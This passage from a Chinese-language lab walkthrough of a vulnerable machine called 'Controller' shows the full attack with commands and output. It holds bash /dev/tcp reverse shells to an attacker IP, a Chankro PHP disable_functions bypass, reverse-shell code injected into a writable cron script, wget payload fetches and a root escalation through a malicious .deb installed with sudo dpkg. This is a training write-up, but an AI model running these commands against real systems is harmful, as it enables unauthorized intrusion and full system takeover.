lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410551.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905124427049\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u5230\u5b83\u7684\u4e00\u4e9b\u7981\u7528\u51fd\u6570\uff0c\u5c1d\u8bd5\u8fdb\u884c\u7ed5\u8fc7\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/php-tricks-esp\/php-useful-functions-disable_functions-open_basedir-bypass\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/php-tricks-esp\/php-useful-functions-disable_functions-open_basedir-bypass<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ git clone https:\/\/github.com\/teambi0s\/dfunc-bypasser.git\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ cd dfunc-bypasser\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/dfunc-bypasser]\n\u2514\u2500$ python2 dfunc-bypasser.py -h 2&gt;\/dev\/null\nusage: dfunc-bypasser.py [-h] [--url URL] [--file FILE]\n\noptional arguments:\n  -h, --help   show this help message and exit\n  --url URL    PHPinfo URL: eg. https:\/\/example.com\/phpinfo.php\n  --file FILE  PHPinfo localfile path: eg. dir\/phpinfo\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/dfunc-bypasser]\n\u2514\u2500$ python2 dfunc-bypasser.py --url http:\/\/192.168.10.101:8000\/phpinfo.php 2&gt;\/dev\/null\n\n                                ,---,     \n                                  .&#039;  .&#039; `\\   \n                                  ,---.&#039;     \\  \n                                  |   |  .`\\  | \n                                  :   : |  &#039;  | \n                                  |   &#039; &#039;  ;  : \n                                  &#039;   | ;  .  | \n                                  |   | :  |  &#039; \n                                  &#039;   : | \/  ;  \n                                  |   | &#039;` ,\/   \n                                  ;   :  .&#039;     \n                                  |   ,.&#039;       \n                                  &#039;---&#039;         \n\n                        authors: __c3rb3ru5__, $_SpyD3r_$\n\nPlease add the following functions in your disable_functions option: \npcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,error_log,link,symlink,syslog,ld,mail,mb_send_mail\nIf PHP-FPM is there stream_socket_sendto,stream_socket_client,fsockopen can also be used to be exploit by poisoning the request to the unix socket<\/code><\/pre>\n<p>\u53d1\u73b0\u6709\u5f88\u591a\u51fd\u6570\u53ef\u4ee5\u4f7f\u7528\uff0c\u5305\u62ec<strong>mb_send_mail<\/strong>\u51fd\u6570\uff0c\u5c1d\u8bd5\u4f7f\u7528 <code>hacktrick<\/code>\u5efa\u8bae\u7684\u4e00\u4e2a\u5de5\u5177 <a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/php-tricks-esp\/php-useful-functions-disable_functions-open_basedir-bypass#bypass-using-chankro\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/php-tricks-esp\/php-useful-functions-disable_functions-open_basedir-bypass#bypass-using-chankro<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ git clone https:\/\/github.com\/TarlogicSecurity\/Chankro.git\nCloning into &#039;Chankro&#039;...\nremote: Enumerating objects: 59, done.\nremote: Total 59 (delta 0), reused 0 (delta 0), pack-reused 59 (from 1)\nReceiving objects: 100% (59\/59), 35.91 KiB | 162.00 KiB\/s, done.\nResolving deltas: 100% (26\/26), done.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ cd Chankro    \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/Chankro]\n\u2514\u2500$ ls -la    \ntotal 80\ndrwxr-xr-x 3 kali kali  4096 Sep  5 00:55 .\ndrwxr-xr-x 4 kali kali  4096 Sep  5 00:55 ..\n-rw-r--r-- 1 kali kali  2436 Sep  5 00:55 chankro.py\ndrwxr-xr-x 8 kali kali  4096 Sep  5 00:55 .git\n-rw-r--r-- 1 kali kali  7292 Sep  5 00:55 hook32.so\n-rw-r--r-- 1 kali kali  8504 Sep  5 00:55 hook64.so\n-rw-r--r-- 1 kali kali   444 Sep  5 00:55 hook.c\n-rw-r--r-- 1 kali kali 35141 Sep  5 00:55 LICENSE\n-rw-r--r-- 1 kali kali   904 Sep  5 00:55 README.md\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/Chankro]\n\u2514\u2500$ vim shell.sh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/Chankro]\n\u2514\u2500$ batcat shell.sh \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500       \u2502 File: shell.sh\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500   1   \u2502 bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.10.102\/2345 &lt;&amp;1&#039;\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller\/Chankro]\n\u2514\u2500$ python2 chankro.py --arch 64 --input shell.sh --path \/srv\/www\/php --output shell.php      \n\n     -=[ Chankro ]=-\n    -={ @TheXC3LL }=-\n\n[+] Binary file: shell.sh\n[+] Architecture: x64\n[+] Final PHP: shell.php\n\n[+] File created!<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e0a\u4f20\u6587\u4ef6\u53cd\u5f39shell\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410552.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410552.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905130158975\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8bbf\u95ee\u6fc0\u6d3b\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.101:8000\/uploads\/shell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410553.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410553.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905130324762\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5b9a\u65f6\u4efb\u52a1\u63d0\u6743<\/h3>\n<pre><code class=\"language-bash\">(remote) webservices@controller:\/srv\/www\/php\/uploads$ cd ~\n(remote) webservices@controller:\/home\/webservices$ ls -la\ntotal 36\ndrwxr-xr-x 3 webservices webservices 4096 Jun 27  2021 .\ndrwxr-xr-x 5 root        root        4096 Jun 27  2021 ..\nlrwxrwxrwx 1 webservices webservices    9 Jun 27  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 webservices webservices  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 webservices webservices 3771 Feb 25  2020 .bashrc\ndrwxrwxr-x 3 webservices webservices 4096 Jun 27  2021 .local\n-rw-r--r-- 1 webservices webservices  807 Feb 25  2020 .profile\n-rw-rw-r-- 1 webservices webservices   75 Jun 27  2021 .selected_editor\n-rw------- 1 webservices webservices  916 Jun 27  2021 .viminfo\n-rw-rw-r-- 1 webservices webservices   14 Jun 27  2021 user.txt\n(remote) webservices@controller:\/home\/webservices$ cat user.txt \n............\n(remote) webservices@controller:\/home\/webservices$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/snap\/core18\/2074\/bin\/mount\n\/snap\/core18\/2074\/bin\/ping\n\/snap\/core18\/2074\/bin\/su\n\/snap\/core18\/2074\/bin\/umount\n\/snap\/core18\/2074\/usr\/bin\/chfn\n\/snap\/core18\/2074\/usr\/bin\/chsh\n\/snap\/core18\/2074\/usr\/bin\/gpasswd\n\/snap\/core18\/2074\/usr\/bin\/newgrp\n\/snap\/core18\/2074\/usr\/bin\/passwd\n\/snap\/core18\/2074\/usr\/bin\/sudo\n\/snap\/core18\/2074\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core18\/2074\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core18\/2829\/bin\/mount\n\/snap\/core18\/2829\/bin\/ping\n\/snap\/core18\/2829\/bin\/su\n\/snap\/core18\/2829\/bin\/umount\n\/snap\/core18\/2829\/usr\/bin\/chfn\n\/snap\/core18\/2829\/usr\/bin\/chsh\n\/snap\/core18\/2829\/usr\/bin\/gpasswd\n\/snap\/core18\/2829\/usr\/bin\/newgrp\n\/snap\/core18\/2829\/usr\/bin\/passwd\n\/snap\/core18\/2829\/usr\/bin\/sudo\n\/snap\/core18\/2829\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core18\/2829\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/21759\/usr\/lib\/snapd\/snap-confine\n\/snap\/core20\/2318\/usr\/bin\/chfn\n\/snap\/core20\/2318\/usr\/bin\/chsh\n\/snap\/core20\/2318\/usr\/bin\/gpasswd\n\/snap\/core20\/2318\/usr\/bin\/mount\n\/snap\/core20\/2318\/usr\/bin\/newgrp\n\/snap\/core20\/2318\/usr\/bin\/passwd\n\/snap\/core20\/2318\/usr\/bin\/su\n\/snap\/core20\/2318\/usr\/bin\/sudo\n\/snap\/core20\/2318\/usr\/bin\/umount\n\/snap\/core20\/2318\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/2318\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/sbin\/sensible-mda\n\/usr\/bin\/at\n\/usr\/bin\/procmail\n\/usr\/bin\/pkexec\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n\/usr\/bin\/mount\n\/usr\/bin\/fusermount\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/ksu\n\/usr\/bin\/sudo\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/eject\/dmcrypt-get-device<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528at\u63d0\u6743\uff0c\u4f46\u662f\u5931\u6548\u4e86\uff0c\u4e0a\u4f20pspy64\u76d1\u542c\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) webservices@controller:\/home\/webservices$ cd \/tmp\n(remote) webservices@controller:\/tmp$ wget http:\/\/192.168.10.102:8888\/lpspy64\n(remote) webservices@controller:\/tmp$ chmod +x lpspy64 \n(remote) webservices@controller:\/tmp$ .\/lpspy64<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410554.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410554.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905131015679\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u4e00\u4e0b\u8fd9\u4e2a\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) webservices@controller:\/tmp$ cat \/opt\/website.py\nimport socket\nimport sys\nimport os\n\nscan = &#039;127.0.0.1&#039;\nport = 80\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.settimeout(1)\ncheck = s.connect_ex((scan,port))\nif check == 0:\n        os.system(&quot;echo &#039;website up&#039;&gt;&gt; \/opt\/logs\/log.txt&quot;)\nelse:\n        os.system(&quot;echo &#039;website down&#039;&gt;&gt; \/opt\/logs\/log.txt&quot;)\ns.close\nsys.exit(0)\n(remote) webservices@controller:\/tmp$ ls -la \/opt\/website.py\n-rwxrwx--- 1 webservices server 317 Jun 27  2021 \/opt\/website.py<\/code><\/pre>\n<p>\u5b58\u5728\u53ef\u5199\u6743\u9650\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff01<\/p>\n<pre><code class=\"language-bash\">(remote) webservices@controller:\/tmp$ nano \/opt\/website.py \n(remote) webservices@controller:\/tmp$ cat \/opt\/website.py\nimport socket\nimport sys\nimport os\n\nos.system(&#039;bash -c &quot;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.10.102\/3456 &lt;&amp;1&quot;&#039;)\nscan = &#039;127.0.0.1&#039;\nport = 80\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.settimeout(1)\ncheck = s.connect_ex((scan,port))\nif check == 0:\n        os.system(&quot;echo &#039;website up&#039;&gt;&gt; \/opt\/logs\/log.txt&quot;)\nelse:\n        os.system(&quot;echo &#039;website down&#039;&gt;&gt; \/opt\/logs\/log.txt&quot;)\ns.close\nsys.exit(0)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410555.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410555.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905135619355\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>dpkg\u63d0\u6743root<\/h3>\n<p>\u53c2\u8003\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/dpkg\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/dpkg\/#sudo<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410556.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410556.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905140007275\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) server@controller:\/home\/server$ sudo -l\nMatching Defaults entries for server on controller:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser server may run the following commands on controller:\n    (root) NOPASSWD: \/bin\/dpkg -i *\n(remote) server@controller:\/home\/server$ fpm\nbash: fpm: command not found<\/code><\/pre>\n<p>\u5728kali\u4e0a\u5f04\u4e00\u4e0b;<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ TF=$(mktemp -d)\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ echo &#039;exec \/bin\/bash&#039; &gt; $TF\/x.sh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ fpm -n x -s dir -t deb -a all --before-install .\/x.sh $TF  \nNo such file (for before_install): &quot;\/home\/kali\/temp\/Controller\/x.sh&quot; {:level=&gt;:error}\n\/var\/lib\/gems\/3.1.0\/gems\/fpm-1.15.1\/lib\/fpm\/command.rb:460:in `read&#039;: No such file or directory @ rb_sysopen - \/home\/kali\/temp\/Controller\/x.sh (Errno::ENOENT)\n        from \/var\/lib\/gems\/3.1.0\/gems\/fpm-1.15.1\/lib\/fpm\/command.rb:460:in `block in execute&#039;\n        from \/var\/lib\/gems\/3.1.0\/gems\/fpm-1.15.1\/lib\/fpm\/command.rb:463:in `execute&#039;\n        from \/var\/lib\/gems\/3.1.0\/gems\/clamp-1.0.1\/lib\/clamp\/command.rb:68:in `run&#039;\n        from \/var\/lib\/gems\/3.1.0\/gems\/fpm-1.15.1\/lib\/fpm\/command.rb:591:in `run&#039;\n        from \/var\/lib\/gems\/3.1.0\/gems\/clamp-1.0.1\/lib\/clamp\/command.rb:133:in `run&#039;\n        from \/var\/lib\/gems\/3.1.0\/gems\/fpm-1.15.1\/bin\/fpm:7:in `&lt;top (required)&gt;&#039;\n        from \/usr\/local\/bin\/fpm:25:in `load&#039;\n        from \/usr\/local\/bin\/fpm:25:in `&lt;main&gt;&#039;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ fpm -n x -s dir -t deb -a all --before-install $TF\/x.sh $TF\nCreated package {:path=&gt;&quot;x_1.0_all.deb&quot;}\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ ls -la\ntotal 36\ndrwxr-xr-x   4 kali kali 4096 Sep  5 01:58 .\ndrwxr-xr-x 129 kali kali 4096 Sep  4 23:09 ..\ndrwxr-xr-x   3 kali kali 4096 Sep  5 00:58 Chankro\ndrwxr-xr-x   4 kali kali 4096 Sep  5 00:50 dfunc-bypasser\n-rw-r--r--   1 kali kali   60 Sep  4 23:55 ping1.py\n-rw-r--r--   1 kali kali   69 Sep  5 00:04 ping2.py\n-rw-r--r--   1 kali kali   49 Sep  4 23:42 ping.py\n-rw-r--r--   1 kali kali  102 Sep  5 00:09 shell.py\n-rw-r--r--   1 kali kali 1096 Sep  5 01:58 x_1.0_all.deb<\/code><\/pre>\n<p>\u4f20\u8fc7\u53bb\u63d0\u6743\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) server@controller:\/home\/server$ cd \/tmp\n(remote) server@controller:\/tmp$ wget http:\/\/192.168.10.102:8888\/x_1.0_all.deb\n--2024-09-05 06:00:47--  http:\/\/192.168.10.102:8888\/x_1.0_all.deb\nConnecting to 192.168.10.102:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1096 (1.1K) [application\/vnd.debian.binary-package]\nSaving to: \u2018x_1.0_all.deb\u2019\n\nx_1.0_all.deb                                   100%[====================================================================================================&gt;]   1.07K  --.-KB\/s    in 0s      \n\n2024-09-05 06:00:47 (44.4 MB\/s) - \u2018x_1.0_all.deb\u2019 saved [1096\/1096]\n\n(remote) server@controller:\/tmp$ chmod 700 x_1.0_all.deb\n(remote) server@controller:\/tmp$ sudo dpkg -i x_1.0_all.deb\nSelecting previously unselected package x.\n(Reading database ... 76528 files and directories currently installed.)\nPreparing to unpack x_1.0_all.deb ...\nroot@controller:\/# cd ~\nroot@controller:~# ls -la\ntotal 56\ndrwx------  6 root root  4096 Jun 27  2021 .\ndrwxr-xr-x 20 root root  4096 Jun 27  2021 ..\nlrwxrwxrwx  1 root root     9 Jun 27  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  3106 Dec  5  2019 .bashrc\ndrwx------  2 root root  4096 Jun 27  2021 .cache\ndrwxr-xr-x  3 root root  4096 Jun 27  2021 .local\n-rw-------  1 root root   495 Jun 27  2021 .mysql_history\n-rw-r--r--  1 root root   161 Dec  5  2019 .profile\n-rw-r--r--  1 root root    75 Jun 27  2021 .selected_editor\ndrwx------  2 root root  4096 Jun 27  2021 .ssh\n-rw-------  1 root root 10710 Jun 27  2021 .viminfo\n-rw-r--r--  1 root root    24 Jun 27  2021 root.txt\ndrwxr-xr-x  3 root root  4096 Jun 27  2021 snap<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410557.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410557.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905140221739\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a 